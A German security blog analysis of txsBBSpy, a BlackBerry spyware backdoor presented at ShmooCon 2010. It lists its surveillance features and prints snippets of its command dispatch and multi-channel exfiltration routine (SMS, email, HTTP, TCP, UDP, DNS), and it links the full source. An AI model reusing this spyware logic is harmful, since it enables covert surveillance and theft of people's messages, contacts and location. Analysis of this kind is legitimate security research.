Tyler Shields des Unternehmens Veracode hielt an der ShmooCon 2010 einen Vortrag zur Sicherheit von BlackBerry-Geräten. Dabei diskutierte er in erster Linie die Möglichkeiten von mobiler Spyware:

While a number of “vendors” sell Blackberry spyware, until now only a limited number of public code examples exist. Real time capture of SMS messages, Emails, and phone call logs are a fraction of the features to be presented. Full source code to the spyware will also be released.

Seine Ausführungen illustrierte er mit einer eigens dafür angefertigten Backdoor namens txsBBSpy. Den Java-Quelltext dieser hat er noch gleichentags veröffentlicht. In diesem Beitrag soll die Funktionsweise der Hintertür sowie die Implementierung besprochen werden.

Grundlage

Bei txsBBSpy handelt es sich um eine Spyware, die als Backdoor eingebracht wird. Sie wird genutzt, um die Aktivitäten einer Person zu überwachen und einzusehen. Ist die Malware einmal installiert, kann sie über verschiedene Kanäle gesteuert werden. Bei dieser Steuerung lässt sich das Verhalten der Hintertür anpassen, Zugriffe auf Datenbestände sowie Datensammlungen durchführen. Damit wird im weitesten Sinn ein RAT (Remote Access Tool) für BlackBerry realisiert. Ähnliche Ansätze haben wir bei unseren Implementierungen für das Apple iPhone und für HTC mit Windows Mobile realisiert.

Die bereitgestellte Spyware ist primär in der Lage, sämtliche abgespeicherten Daten auslesen zu lassen. Dazu gehören die folgenden Kerndaten eines modernen Mobiltelefons:

• Adressbuch
• Anrufliste
• Emails

Zusätzlich können aber auch aktuelle Aktivitäten in Echtzeit überwacht werden. Zu diesen gehören die folgenden Möglichkeiten moderner Mobiltelefone:

• GPS-Koordinaten
• Aufzeichnung durch das eingebaute Mikrofon

Damit wird eine umfassende Überwachung des Geräts sowie dessen Benutzers möglich. Weiterführende Möglichkeiten, wie zum Beispiel das Generieren neuer Adressbucheinträge oder das Verschicken von Emails/SMS wäre ebenso denkbar. Damit liesse sich zum Beispiel ein Proxy oder ein Botnet aufbauen, mit dem sich aktuelle Geschäftsmodelle von Cyberkriminellen weiter vorantreiben lassen.

Fernsteuerung

Die Fernsteuerung erfolgt durch processCommand(String cmd), wobei das Argument cmd unterschiedliche Kommandos entgegennehmen in der Lage ist. Die untenstehende Tabelle illustriert die implementierten Mechanismen. Wird beispielsweise TXSPHLON übergeben, wird der Phone Listener aktiviert. Und mit TXSEXFILSMS wird die Datenextragierung mittels SMS realisiert.

Anhand der in c abgelegten ID werden sodann mit einem case-Konstrukt die jeweiligen Funktionen aufgerufen. Dies ist sehr modular und strukturiert gelöst. Zum Beispiel wird mittels folgendem Code der Phone Listener eingerichtet:

pl = new PhoneLogger();
Phone.addPhoneListener(pl);
break;

Ändern und Nutzen der Transaktionsmethode

Wird die Transaktionsmethode geändert, wird dies in this.method abgelegt, wobei hier acht unterschiedliche Werte von 1 bis 8 erwartet werden. Die nachfolgende Tabelle zeigt den Stand der gegenwärtigen Implementierung auf.

Hiermit wird eine umfassende und solide Implementierung bereitgestellt, die mit einem hohen Mass an Flexibilität aufwarten kann. So ist es möglich zwischen unterschiedlichen Kanälen zu wechseln, was spätestens dann erforderlich wird, wenn die Zielsystem mit zusätzlichen Mechanismen geschützt werden (z.B. Firewalling oder Hardening der Konfigurationen).

Die jeweiligen Transaktionsmethoden werden dann durch die Funktion exfiltrate(String msg) angesteuert. Diese entscheidet anhand der als msg übergebenen Argumente darüber, wie nun eine Datenübertragung stattfindet.

private void exfiltrate(String msg)
{
 if (msg.startsWith(“TXS_”) != true) // Make sure that we haven’t already exfiltrated this message
 {
  msg = “TXS_”+msg; // Prepend our send marker
  switch (this.method)
  {
  case 1: exfilSMS(msg); break;
  case 2: exfilSMS_dg(msg); break;
  case 3: exfilEmail(msg); break;
  case 4: exfilHTTP_GET(msg); break;
  case 5: exfilHTTP_POST(msg); break;
  case 6: exfilTCP(msg); break;
  case 7: exfilUDP(msg); break;
  case 8: exfilDNS(msg); break;
  } 
 }


 return;
}

Weiterführend sind dann Funktionen wie exfilSMS(msg) für das Übertragen der Daten per SMS oder exfilHTTP_GET(msg) für eine Transaktion per HTTP GET zuständig.

Eine Datenübertragung per SMS findet relativ simpel statt, indem durch den jeweiligen Connector das SMS mittels dem Scheme sms:// generiert wird:

(MessageConnection) Connector.open("sms://" + this.pnum + ":3590");

Erkennung und Entdeckung

Die Erkennung der Malware ist durch die üblichen Mittel möglich. Eine Antiviren-Lösung kann versuchen durch patternbasierte oder heuristische Methoden die offensichtlichen Codeteile als solche zu identifizieren.

Es gibt jedoch eine Vielzahl an Eigenarten, die die Hintertür spätestens bei deren Aktivitäten im Netzwerk erkennen lassen.

Fazit

Man merkt txsBBSpy an, dass es durch jemanden programmiert wurde, der ein derartiges Produkt nicht zum ersten Mal entwickelt hat. Zu strukturiert und zu modular ist die gegebene Implementierung, deren Sourcecode sich sehr einfach und angenehm lesen lässt.

Und so spürt man dann auch heraus, dass die Entwicklung weit über einen simplen Proof-of-Concept hinaus geht. Tyler steckt ein gewisses Mass an Leidenschaft in seine Lösung, die sich durchaus produktiv einsetzen lässt. Die gegebene Flexibilität ist nicht zu unterschätzen und eine Nutzung deshalb zusätzlich auch noch komfortabel.

Nur in einigen wenigen Punkten findet sich Verbesserungspotential. So gibt es einen kleinen Fehler, der es verunmöglicht, dass eine Datenübertragung mittels DNS stattfinden kann. Und so macht es auch an anderer Stelle den Anschein, dass der veröffentlichte Code nicht ganz dem entspricht, was hinter verschlossenen Türen entwickelt wurde. Es schien, als sei so manches Feature kurzfristig vor dem Release entfernt worden, was durch den Entwickler in einem Comment bestätigt wurde:

Great catch ;) There is indeed a removed feature in that location of the code. Consider it a preview of additional things to be released at Source Boston conference in April.

Dennoch zeigt das Produkt auf, dass auch auf BlackBerry-Plattformen mit Risiken durch Malware zu rechnen ist. Da die Geräte bzw. die darauf installierte Software zudem vermehrt Schwachstellen aufweisen (z.B. wie zuletzt im PDF-Viewer), ist durchaus mit einem Potential für Kompromittierungen zu rechnen. Erste breitflächige Infektionen sind jedoch in den letzten Monaten schon zu verzeichnen gewesen. Dies ist nicht verwunderlich, weist das Unternehmen comScore die Verbreitung von BlackBerry mit 41.6% noch Ende 2009 als die grösste in den USA aus.

Über den Autor

Marc Ruef ist seit Ende der 1990er Jahre im Cybersecurity-Bereich aktiv. Er hat vor allem im deutschsprachigen Raum aufgrund der Vielzahl durch ihn veröffentlichten Fachpublikationen und Bücher – dazu gehört besonders Die Kunst des Penetration Testing – Bekanntheit erlangt. Er ist Dozent an verschiedenen Fakultäten, darunter ETH, HWZ, HSLU und IKF. (ORCID 0000-0002-1328-6357)

Links

• http://threatcenter.smobilesystems.com/?p=1752
• http://www.blackberry.com/btsc/search.do?cmd=displayKC&docType=kc&externalId=KB19860
• http://www.comscore.com/Press_Events/Press_Releases/2010/2/comScore_Reports_December_2009_U.S._Mobile_Subscriber_Market_Share
• http://www.shmoocon.org/presentations-all.html#monkeyberry
• http://www.sophos.com/blogs/gc/g/2009/11/25/smartphone-virus/
• http://www.symantec.com/connect/de/blogs/phonesnoop-spying-blackberry-users
• http://www.veracode.com/blog/2010/02/is-your-blackberry-app-spying-on-you/
• http://www.veracode.com/blog/2010/02/is-your-blackberry-app-spying-on-you/comment-page-1/#comment-3261
• http://www.veracode.com/blog/2010/02/is-your-blackberry-app-spying-on-you/comment-page-1/#comment-3266
• http://www.veracode.com/blog/tyler-shields-senior-security-researcher/
• http://www.veracode.com/images/txsBBSpy.java